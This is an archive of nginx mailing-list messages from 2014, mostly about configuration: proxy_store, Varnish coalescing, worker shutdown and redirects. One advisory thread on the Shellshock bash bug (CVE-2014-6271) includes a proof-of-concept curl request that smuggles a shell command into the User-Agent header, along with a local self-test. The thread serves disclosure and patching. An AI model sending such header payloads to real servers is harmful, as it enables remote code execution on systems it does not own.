URL: From nginx-forum at nginx.us Tue Sep 23 11:26:41 2014 From: nginx-forum at nginx.us (igorhmm) Date: Tue, 23 Sep 2014 07:26:41 -0400 Subject: Worker processes not shutting down In-Reply-To: <541D3892.5090907@xtremenitro.org> References: <541D3892.5090907@xtremenitro.org> Message-ID: Hi people, @BR: I not found anything on logs related to this problem, but I still investigating and trying to reproduce. @oscaretu: this looks a nice tool, thanks for recommendation @dewanggaba: I'm using the reload command. We can't use restart because this will kill all established connections Thanks for all Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253478#msg-253478 From vbart at nginx.com Tue Sep 23 14:03:16 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 23 Sep 2014 18:03:16 +0400 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: Message-ID: <6086928.qVWrtWDE0h@vbart-workstation> On Tuesday 23 September 2014 00:06:56 shahzaib shahzaib wrote: > Is there any way with nginx that i could put an hold on the subsequent > requests and only proxy the single request for same file in order to > prevent filling up the tmp folder ? tmp is kept on filling up due to the > multiple users are accessing the same file and file is not downloaded yet. > [..] http://nginx.org/r/proxy_cache_lock wbr, Valentin V. Bartenev From shahzaib.cb at gmail.com Tue Sep 23 14:34:23 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Tue, 23 Sep 2014 19:34:23 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <6086928.qVWrtWDE0h@vbart-workstation> References: <6086928.qVWrtWDE0h@vbart-workstation> Message-ID: @Valentine, is proxy_cache_lock supported with proxy_store ? On Tue, Sep 23, 2014 at 7:03 PM, Valentin V. 
Bartenev wrote: > On Tuesday 23 September 2014 00:06:56 shahzaib shahzaib wrote: > > Is there any way with nginx that i could put an hold on the subsequent > > requests and only proxy the single request for same file in order to > > prevent filling up the tmp folder ? tmp is kept on filling up due to the > > multiple users are accessing the same file and file is not downloaded > yet. > > > [..] > > http://nginx.org/r/proxy_cache_lock > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Tue Sep 23 16:41:48 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 23 Sep 2014 20:41:48 +0400 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> Message-ID: <2135119.tXnJ49yO9u@vbart-workstation> On Tuesday 23 September 2014 19:34:23 shahzaib shahzaib wrote: > @Valentine, is proxy_cache_lock supported with proxy_store ? No. But if you're asking, then you're using a wrong tool. The proxy_store feature is designed to be very simple and stupid. To meet your needs you should use the proxy_cache directive and its friends. wbr, Valentin V. Bartenev From shahzaib.cb at gmail.com Tue Sep 23 17:24:35 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Tue, 23 Sep 2014 22:24:35 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <2135119.tXnJ49yO9u@vbart-workstation> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> Message-ID: But i cannot switch with proxy_cache because we're mirroring the mp4 files for random seeking using mp4 module and proxy_cache doesn't support random seeking. Is there a way i can use bash script with proxy_store ? 
I want the following logic to prevent duplicate downloads:

1st user: client (requests test.mp4) --> nginx (file does not exist) --> check that tmp.txt does not exist --> create tmp.txt --> download test.mp4 from the origin --> remove tmp.txt

2nd user requesting the same test.mp4: client (requests test.mp4) --> nginx (file does not exist) --> tmp.txt already exists (which means nginx is already downloading the file) --> redirect the user towards the origin server (keep redirecting users as long as tmp.txt is not removed)

3rd user requesting the same test.mp4: client (requests test.mp4) --> nginx (file exists) --> serve from the cache.

So tmp.txt plays the main role here and prevents the subsequent requests for the same file, but i have no idea how to implement it with nginx. If only someone could point me in the right direction. :( Regards. Shahzaib On Tue, Sep 23, 2014 at 9:41 PM, Valentin V. Bartenev wrote: > On Tuesday 23 September 2014 19:34:23 shahzaib shahzaib wrote: > > @Valentine, is proxy_cache_lock supported with proxy_store ? > > No. But if you're asking, then you're using a wrong tool. > The proxy_store feature is designed to be very simple and stupid. > > To meet your needs you should use the proxy_cache directive > and its friends. > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Tue Sep 23 21:42:17 2014 From: r at roze.lv (Reinis Rozitis) Date: Wed, 24 Sep 2014 00:42:17 +0300 Subject: Forward single request to upstream server via proxy_store !!
In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> Message-ID: <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> > But i cannot switch with proxy_cache because we're mirroring the mp4 files > for random seeking using mp4 module and proxy_cache doesn't support random > seeking. Is there a way i can use bash script with proxy_store ? I want > the following logic to prevent duplicate downloads :- You can try to put Varnish ( https://www.varnish-cache.org ) between your proxy_store and content server. It supports request coalescing. p.s. a branch of the 3.x tree and the new 4.x even does have stream support. rr From agentzh at gmail.com Tue Sep 23 22:07:17 2014 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Tue, 23 Sep 2014 15:07:17 -0700 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello! On Fri, Sep 19, 2014 at 12:50 PM, igorhmm wrote: > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see with > strace warnings in the old wolker about EAGAIN (Resource temporarily > unavailable). I can see that because old workers still running: > Nginx workers take forever to quit usually because of pending timers. One suggestion is to dump out all the pending timers' handlers so that we can know what parts of nginx are responsible for this. To be more specific, you can traverse through the rbtree rooted at the C global variable "ngx_event_timer_rbtree" and for each tree node, you obtain the ngx_event_t object by doing the pointer arithmetic "((char *) cur - offsetof(ngx_event_t, timer))", then check the function pointed to by "ev->handler" [1]. All these checks can be done in a gdb script or a systemtap script that is inspecting a typical nginx worker pending shutting down. 
[1] You can take this piece of C code from the ngx_lua module as an example: https://github.com/openresty/lua-nginx-module/blob/master/src/ngx_http_lua_timer.c#L465 But you need to rewrite it in gdb's python extension language or systemtap's stap scripting language for online dynamic tracing. From nginx-forum at nginx.us Wed Sep 24 06:23:49 2014 From: nginx-forum at nginx.us (bjorntj) Date: Wed, 24 Sep 2014 02:23:49 -0400 Subject: New session id on each request... In-Reply-To: References: Message-ID: <90ec20b584ed5a30d0cb123e0f338d78.NginxMailingListEnglish@forum.nginx.org> No one has any insights on this? BTJ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253367,253503#msg-253503 From nginx-forum at nginx.us Wed Sep 24 09:03:42 2014 From: nginx-forum at nginx.us (hungnguyen) Date: Wed, 24 Sep 2014 05:03:42 -0400 Subject: [nginx module] Save response into temp file In-Reply-To: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> References: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> Message-ID: <454ef0b1b4b71e3d16b6de35a17961f5.NginxMailingListEnglish@forum.nginx.org> anyone? Please! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253477,253506#msg-253506 From nginx-forum at nginx.us Wed Sep 24 09:52:56 2014 From: nginx-forum at nginx.us (hagarwal502) Date: Wed, 24 Sep 2014 05:52:56 -0400 Subject: Alternate POST request to nginx failing Message-ID: <38207e4eb3e3c93b34f76e4886f90df5.NginxMailingListEnglish@forum.nginx.org> Hello We are experiencing a strange issue with nginx. If I send multiple POST requests to the server one after the other, every alternate POST request fails. I tried debugging the nginx code and found that on every POST request the following functions are supposed to be called.
Caller function: ngx_epoll_process_events handlers/functions to be called: 1> ngx_event_accept 2> ngx_http_wait_request_handler 3> ngx_http_request_handler However, when I make a POST request, the first two handlers are invoked and the request returns successfully. But the last handler is not invoked. On the second request only "ngx_http_request_handler" is invoked and the request returns without calling the "http module". I'm yet to dig into further details of the nginx code and understand it, but in case you have come across a similar scenario, please let me know of the problem and solution. That would save a lot of my time. Thank you Regards Himanshu Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253507,253507#msg-253507 From vbart at nginx.com Wed Sep 24 10:13:22 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 24 Sep 2014 14:13:22 +0400 Subject: New session id on each request... In-Reply-To: References: Message-ID: <2122375.s2RKS2njGU@vbart-laptop> On Thursday 18 September 2014 03:40:03 bjorntj wrote: > I have Nginx as a reverse proxy in front of a Tomcat server running a > webapp. > This works ok using Firefox but not Chrome or IE... When using Chrome or IE, > the JSESSIONID gets a new value for each request (instead of keeping the > same value as it should). > Are there some settings I am missing to fix this? > > (Using Apache it works for all browsers but I want to use Nginx.... :) ) > No, there are no such special settings. You should provide more information to get help. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Wed Sep 24 10:15:35 2014 From: nginx-forum at nginx.us (bjorntj) Date: Wed, 24 Sep 2014 06:15:35 -0400 Subject: New session id on each request... In-Reply-To: <2122375.s2RKS2njGU@vbart-laptop> References: <2122375.s2RKS2njGU@vbart-laptop> Message-ID: <53981a04f156bfe56775f6c62f609bf2.NginxMailingListEnglish@forum.nginx.org> What kind of information is needed? My nginx config? Anything else?
BTJ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253367,253510#msg-253510 From shahzaib.cb at gmail.com Wed Sep 24 11:31:37 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 24 Sep 2014 16:31:37 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> Message-ID: @RR. could you guide me a bit on it or point me to some guide to start with. I have worked with varnish regarding php caching so i have the basic knowledge of varnish but i am just not getting on how to make it work with proxy_store. :( On Wed, Sep 24, 2014 at 2:42 AM, Reinis Rozitis wrote: > But i cannot switch with proxy_cache because we're mirroring the mp4 files >> for random seeking using mp4 module and proxy_cache doesn't support random >> seeking. Is there a way i can use bash script with proxy_store ? I want the >> following logic to prevent duplicate downloads :- >> > > You can try to put Varnish ( https://www.varnish-cache.org ) between your > proxy_store and content server. It supports request coalescing. > > p.s. a branch of the 3.x tree and the new 4.x even does have stream > support. > > rr > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Wed Sep 24 11:46:30 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 24 Sep 2014 15:46:30 +0400 Subject: New session id on each request... 
In-Reply-To: <53981a04f156bfe56775f6c62f609bf2.NginxMailingListEnglish@forum.nginx.org> References: <2122375.s2RKS2njGU@vbart-laptop> <53981a04f156bfe56775f6c62f609bf2.NginxMailingListEnglish@forum.nginx.org> Message-ID: <2445111.bADthjOY0Y@vbart-workstation> On Wednesday 24 September 2014 06:15:35 bjorntj wrote: > What kind of information is needed? My nginx config? Anything else? [..] The output of nginx -V and the configuration are the minimal information someone needs to help in diagnosing any problem. In your case, the first step to identify the cause of the issue should be comparing the requests from these browsers. wbr, Valentin V. Bartenev From wandenberg at gmail.com Wed Sep 24 12:33:51 2014 From: wandenberg at gmail.com (Wandenberg Peixoto) Date: Wed, 24 Sep 2014 09:33:51 -0300 Subject: [nginx module] Save response into temp file In-Reply-To: <454ef0b1b4b71e3d16b6de35a17961f5.NginxMailingListEnglish@forum.nginx.org> References: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> <454ef0b1b4b71e3d16b6de35a17961f5.NginxMailingListEnglish@forum.nginx.org> Message-ID: As your snippet is very short I cannot be sure, but here are some questions to guide the debugging:
- did you close the file when you finished writing? Some bytes may be in the buffer and will only be flushed after the close.
- was the m->chain used before to write its content to another place? If yes, it may be necessary to reset some internal pointers.
- what do you mean by "not csv file"? What is the content of the 0000000001 file?
Regards On Wed, Sep 24, 2014 at 6:03 AM, hungnguyen wrote: > anyone? Please! > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253477,253506#msg-253506 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed...
URL: From francis at daoine.org Wed Sep 24 12:40:02 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 24 Sep 2014 13:40:02 +0100 Subject: Redirect to a different url based on a query. In-Reply-To: References: Message-ID: <20140924124002.GK3771@daoine.org> On Thu, Sep 18, 2014 at 07:34:32PM +0530, Geo P.C. wrote: Hi there, > *We need to redirect only the url wp-login.php?action=lostpassword to other > and all other url including wp-login.php?action=login need to proxypass* Untested, but something like location = /wp-login.php { if ($arg_action = lostpassword) { return 301 http://whatever$request_uri; } proxy_pass wherever; } should probably come close to what you want. You could test "$args = action=lostpassword" if that better describes the requests that you want to handle specially. f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 24 12:50:14 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 24 Sep 2014 13:50:14 +0100 Subject: trouble changing uri to query string In-Reply-To: References: <20140917071707.GE3771@daoine.org> Message-ID: <20140924125014.GL3771@daoine.org> On Sun, Sep 21, 2014 at 04:40:00PM +0300, Roland RoLaNd wrote: Hi there, > Using map is a cool idea, though i have around 2000 possible imageId and size and more than 9 million user id.. they're always imageIDs are prone to change, wouldn't that mean i have to add them manually every time ? map can use regex. However, map can only use a single variable, so I think you would need two maps (or perhaps a "set" within an "if") in order to save the request uri without the user part. For example: map $uri $the_bit_before_user { ~(?P<m>.*)&user=[0-9]+& $m; default $uri; } map $uri $the_bit_after_user { ~&user=[0-9]+(?P<m>&.*) $m; default ""; } followed by a later set $request_without_user $the_bit_before_user$the_bit_after_user; could give you a variable that might be useful to use as part of your cache_key.
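The two maps above can be hard to follow in flattened form. The same extraction logic can be sketched with Python's re module (the function name and the sample URIs here are invented for illustration, not part of the original suggestion):

```python
# Python sketch of what the two nginx maps compute: strip an
# "&user=NNN" argument out of the uri, keeping everything around it.
import re

def request_without_user(uri):
    # Mirrors map #1: everything before the &user=NNN& part.
    before = re.match(r"(.*)&user=[0-9]+&", uri)
    # Mirrors map #2: everything from the "&" that follows the user id.
    after = re.search(r"&user=[0-9]+(&.*)", uri)
    bit_before = before.group(1) if before else uri   # "default $uri"
    bit_after = after.group(1) if after else ""       # 'default ""'
    return bit_before + bit_after

print(request_without_user("/img&imageId=77&user=12345&size=big"))
# -> /img&imageId=77&size=big
```

The caveat from the message still applies: an nginx map only sees a single variable, so it takes two maps plus a set to do what one function does here.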
> On another note, let's say i mapped all wanted cache keys, how can i force the incoming requests to match with that key ? as i would be stuck with the same dilemma as now, since the uri as it's missing the "?" isn't treating the arguments as query string but part of the uri itself... There are no arguments. There is no query string. There is only the uri (the location, in this case). Can you describe what you want to happen when a client makes a request of nginx? I imagine it is something like "if nginx has the appropriate response in cache send it; otherwise do something to populate the cache and send the response". But I do not know what you think should populate the cache in the first place. f -- Francis Daly francis at daoine.org From r at roze.lv Wed Sep 24 13:32:39 2014 From: r at roze.lv (Reinis Rozitis) Date: Wed, 24 Sep 2014 16:32:39 +0300 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> Message-ID: <88FE1279903F4E289BB35A478ED09E00@MasterPC> > @RR. could you guide me a bit on it or point me to some guide to start > with. I have worked with varnish regarding php caching so i have the basic > knowledge of varnish but i am just not getting on how to make it work with > proxy_store. :( Depending on your needs (for example SSL) you can put varnish in different places in the setup: If you use SSL (which varnish itself doesn't support) you can use your proxy_store server as an SSL offloader: 1. [client] <- -> [nginx proxy_store server] <- -> [varnish] <- -> [content_server] .. in this case when multiple requests land onto nginx proxy_store in case the file locally doesnt exist those are forwarded to varnish and combined into a single request to the content server. 
A simplistic/generic nginx config: location / { error_page 404 = @store; } location @store { internal; proxy_pass http://imgstore; proxy_store on; } varnish config: backend default { .host = "content_server.ip"; } sub vcl_recv { set req.backend = default; } Obviously add whatever else you need (like forwarded-for headers to pass the real client ip, cache expire times etc). 2. In case you don't use SSL: [client] <- -> [varnish] <- -> [content_server] (optionally you put nginx or some other software like stud or pound on top of varnish as an SSL offloader; personally I use Shrpx from Spdylay ( https://github.com/tatsuhiro-t/spdylay )) Then the generic varnish config would look basically the same: backend default { .host = "content_server.ip"; } sub vcl_recv { set req.backend = default; } sub vcl_backend_response { set beresp.do_stream = true; } Hope that helps. rr From shahzaib.cb at gmail.com Wed Sep 24 13:55:00 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 24 Sep 2014 18:55:00 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <88FE1279903F4E289BB35A478ED09E00@MasterPC> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> Message-ID: @RR, That's great. Sure it will help me. I am starting to work with it in a local environment and will get back to you once I've made some progress :) Thanks a lot for writing the sample config for me !! On Wed, Sep 24, 2014 at 6:32 PM, Reinis Rozitis wrote: > @RR. could you guide me a bit on it or point me to some guide to start >> with. I have worked with varnish regarding php caching so i have the basic >> knowledge of varnish but i am just not getting on how to make it work with >> proxy_store.
:( [..] > rr > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed...
URL: From nginx-forum at nginx.us Wed Sep 24 23:53:16 2014 From: nginx-forum at nginx.us (mex) Date: Wed, 24 Sep 2014 19:53:16 -0400 Subject: CVE-2014-6271 : Remote code execution through bash Message-ID: hi list, the following bug (Remote code execution through bash) http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ **might** affect you if you use a shell/bash-based fcgi-wrapper like in the following recipe: http://wiki.nginx.org/Fcgiwrap / http://wiki.nginx.org/FcgiwrapDebianInitScript (did not test it); if someone runs a shell-based cgi-wrapper and would like to test the POC from reddit, I'd be interested in the result :D curl -v -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa' http://example.com/path/to/file At least I can confirm this affects bash-based CGIs. ssh-based gitolite/gitlab et al are affected too. local self-test: # Output, when vulnerable: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test # Output, when not vulnerable: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test additional references: Advisory CVE-2014-6271: remote code execution through bash (oss-sec-ml) http://seclists.org/oss-sec/2014/q3/649 Analysis 1 oss-sec ml http://seclists.org/oss-sec/2014/q3/650 Analysis 2 / RedHat https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Naxsi-WAF Signatures http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html regards & happy patching (and sorry for this slightly OT post) mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253532,253532#msg-253532 From nginx-forum at nginx.us Thu Sep 25 04:49:25 2014 From: nginx-forum at nginx.us (hagarwal502) Date: Thu, 25 Sep 2014 00:49:25 -0400 Subject: Alternate POST request to nginx failing In-Reply-To:
<38207e4eb3e3c93b34f76e4886f90df5.NginxMailingListEnglish@forum.nginx.org> References: <38207e4eb3e3c93b34f76e4886f90df5.NginxMailingListEnglish@forum.nginx.org> Message-ID: <00555fd122235f2dce19fad057df2a32.NginxMailingListEnglish@forum.nginx.org> Just a addition. I'm using Nginx Version 1.7.4. Also strangely if I use unix/wget to make the same POST request the issue doesn't appear. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253507,253535#msg-253535 From lists at ruby-forum.com Thu Sep 25 04:50:50 2014 From: lists at ruby-forum.com (Andrew Cantino) Date: Thu, 25 Sep 2014 06:50:50 +0200 Subject: CVE-2014-6271 : Remote code execution through bash In-Reply-To: References: Message-ID: <47e74d51e11e6edba6e78554b30097f2@ruby-forum.com> This could also be abused if you ever add any ENV variables that can come from a user. https://gist.github.com/cantino/9fe5f338e5027a46e2eb -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Thu Sep 25 07:27:19 2014 From: nginx-forum at nginx.us (mex) Date: Thu, 25 Sep 2014 03:27:19 -0400 Subject: CVE-2014-6271 : Remote code execution through bash In-Reply-To: References: Message-ID: <9d5c49bd4abcc49238b1006b4c2abac5.NginxMailingListEnglish@forum.nginx.org> foo ... http://www.openwall.com/lists/oss-security/2014/09/24/17 "Note that on Linux systems where /bin/sh is symlinked to /bin/bash, any popen() / system() calls from within languages such as PHP would be of concern due to the ability to control HTTP_* in the env. /mz" $ ls -la /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash phew ':) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253532,253537#msg-253537 From shahzaib.cb at gmail.com Thu Sep 25 14:13:44 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 25 Sep 2014 19:13:44 +0500 Subject: Forward single request to upstream server via proxy_store !! 
In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> Message-ID: @RR, I've prepared the local environment with the following structure :- client --> nginx (edge) --> varnish --> backend (origin) When I tested this method, i.e.: 3 clients requested test.mp4 (file size 4 MB) --> nginx --> file does not exist (proxy_store) --> varnish --> backend (fetch the file from the origin). When nginx proxied these three requests towards varnish, instead of 4 MB the tmp dir was filled with 12 MB, which means nginx proxied all three requests towards the varnish server and kept creating tmp files as long as the file was not downloaded. (This method failed.) Putting varnish in front of nginx, however, solved this issue: 3 clients requested test.mp4 (file size 4 MB) --> varnish (proxying all requests for mp4, jpg) --> nginx (fetch the file from the origin). This time the tmp dir was filled with 4 MB, which means varnish combined those 3 subsequent requests into 1. -------------------------------------------------------------------------------------------------------------------------- Now varnish also has a flaw: it sends subsequent requests for the same file towards nginx, i.e. the 1st user requested the file http://edge.files.com/videos/test.mp4. During the download of the first requested file, a second user also requested the same file but with random seeking, http://edge.files.com/videos/test.mp4?start=33 . Now, as the request uri is changed, these are two different requests for the same file in varnish, and again the nginx tmp directory was filled with 8 MB instead of 4, which means nginx downloaded the full file twice. So random seeking will only work once the file is cached locally; otherwise nginx will keep creating tmp files for random seeks. I have two questions now :- 1.
If there's way to prevent duplicate downloads for random seekings while the file not downloaded yet ? Note :- We cannot disable mp4 module. 2. Should nginx in front of varnish never work as expected or i am doing something wrong ? Following are existing varnish in front of nginx configs. Please let me know if something need to be fixed :- varnish config :- backend origin002 { .host = "127.0.0.1"; .port = "8080"; } backend origin003 { .host = "127.0.0.1"; .port = "8080"; } sub vcl_recv { if ( req.http.host == "origin002.files.com" ){ set req.backend_hint = origin002; } elsif ( req.http.host == "origin003.files.com" ){ set req.backend_hint = origin003; } elsif ( req.http.host == "origin004.files.com" ){ set req.backend_hint = origin004; } } sub vcl_backend_response { if (bereq.url ~ "^[^?]*\.(mp4|jpeg|jpg)(\?.*)?$"){ set beresp.do_stream = true; return (deliver); } set beresp.grace = 1m; return (deliver); } sub vcl_deliver { } ----------------------------------------------------------------------------------------- Nginx config :- server { listen 127.0.0.1:8080; server_name origin002.files.com; root /var/www/html/tunefiles; location ~ \.(mp4|jpeg|jpg)$ { root /var/www/html/tunefiles; mp4; error_page 404 = @fetch; } location ~ \.(php)$ { proxy_pass http://origin002.files.com:80; } location @fetch { internal; proxy_max_temp_file_size 0; proxy_pass http://content.files.com:80$uri; proxy_store on; proxy_store_access user:rw group:rw all:r; root /var/www/html/tunefiles; } } I can also send the configs which were configured for nginx in front of varnish (which didn't resolved my issue). BTW, i am using malloc storage instead of file in varnish. Thanks !! On Wed, Sep 24, 2014 at 6:55 PM, shahzaib shahzaib wrote: > @RR, That's great. Sure it will help me. I am starting to work with it on > local environment and will get back to you once the progress started :) > > Thanks a lot for writing sample config for me !! 
> > On Wed, Sep 24, 2014 at 6:32 PM, Reinis Rozitis wrote: [..]
>> >> rr >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Thu Sep 25 14:39:12 2014 From: r at roze.lv (Reinis Rozitis) Date: Thu, 25 Sep 2014 17:39:12 +0300 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> Message-ID: <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> > 3 clients requested for test.mp4 (file size is 4mb) --> nginx --> file not > existed (proxy_store) --> varnish --> backend (fetch the file from > origin). > When nginx proxied these three requests subsequently towards the varnish, > despite of filling 4mb of tmp dir it was filled with 12MB which means > nginx is proxying all three requests towards the varnish server and > creating tmp files as long as the file is not downloaded. (The method was > failed) That is expected, this setup only "guards" the content server. > Now varnish also has a flaw to send subsequent requests for same file > towards the nginx i.e It's not really a flaw but default behaviour (different urls mean different content/cachable objects), but of course you can implement your own scenario: By adding: sub vcl_recv { set req.url = regsub(req.url, "\?.*", ""); } will remove all the arguments behind "?" from the uri when forwarding to the content backend. For static content I usually also add something like: unset req.http.Cookie; unset req.http.Accept-Encoding; unset req.http.Cache-Control; to normalise the request and so varnish doesn't try to cache different versions of the same object.
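What the regsub above does can be sketched in Python (a rough, non-authoritative equivalent; the example URLs are invented): the first "?" and everything after it is dropped, so all seek offsets collapse onto one cachable object.

```python
# Python sketch of the VCL line: set req.url = regsub(req.url, "\?.*", "");
# (Illustrative only; the example URLs are invented.)
import re

def normalize(url):
    # Drop the query string so "?start=33"-style seek offsets don't
    # create separate cachable objects for the same mp4 file.
    return re.sub(r"\?.*", "", url)

print(normalize("/videos/test.mp4?start=33"))  # -> /videos/test.mp4
print(normalize("/videos/test.mp4"))           # -> /videos/test.mp4
```

(VCL's regsub replaces only the first match, but since the pattern runs to the end of the string the effect here is the same.)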
If you insist on using proxy_store I would probably also add proxy_ignore_client_abort on; ( http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_ignore_client_abort ) to the nginx configuration. So the requests don't get repeated if the client closes/aborts the request early etc. rr From aflexzor at gmail.com Thu Sep 25 18:05:30 2014 From: aflexzor at gmail.com (Alex Flex) Date: Thu, 25 Sep 2014 12:05:30 -0600 Subject: prepend a php script in all requests Message-ID: <5424596A.4060708@gmail.com> Hey guys, Once i have nginx installed with php fastcgi. Is it possible to preppend a php script to be executed when serving any request? (similar to apache prepend function). If yes could I please have an example. Thanks Alex From shahzaib.cb at gmail.com Thu Sep 25 18:42:52 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 25 Sep 2014 23:42:52 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: @RR, thanks a lot for the explanation and examples. It really helped me :) >>set req.url = regsub(req.url, "\?.*", ""); It will also prevent users seeking the video because the arguments after "?" will remove whenever user will try to seek the video stream, isn't it ? >>unset req.http.Cookie; unset req.http.Accept-Encoding; unset req.http.Cache-Control; I'll apply it right at the top of vcl_recv. >>If you insist on using proxy_store I would probably also add proxy_ignore_client_abort on; Well, only proxy_store is able to fulfill my requirements that is the reason i'll have to stick with it. I am bit confused about the varnish. Actually, i don't need any kind of caching within the varnish as nginx already doing it via proxy_store. 
I just need varnish to merge the subsequent requests into 1 and forward it to nginx, and I think varnish is doing it pretty well. Nevertheless, I am unsure whether malloc caching will have any odd effect on the stream behavior. Following is a curl request for a video file on the caching server; the Age parameter is there too :- curl -I http://edge.files.com/files/videos/2014/09/23/1411461292920e4-720.mp4 HTTP/1.1 200 OK Date: Thu, 25 Sep 2014 18:26:24 GMT Content-Type: video/mp4 Last-Modified: Tue, 23 Sep 2014 08:36:11 GMT ETag: "542130fb-5cd4456" Age: 5 Content-Length: 97338454 Connection: keep-alive Thanks !! Shahzaib On Thu, Sep 25, 2014 at 7:39 PM, Reinis Rozitis wrote: [..]
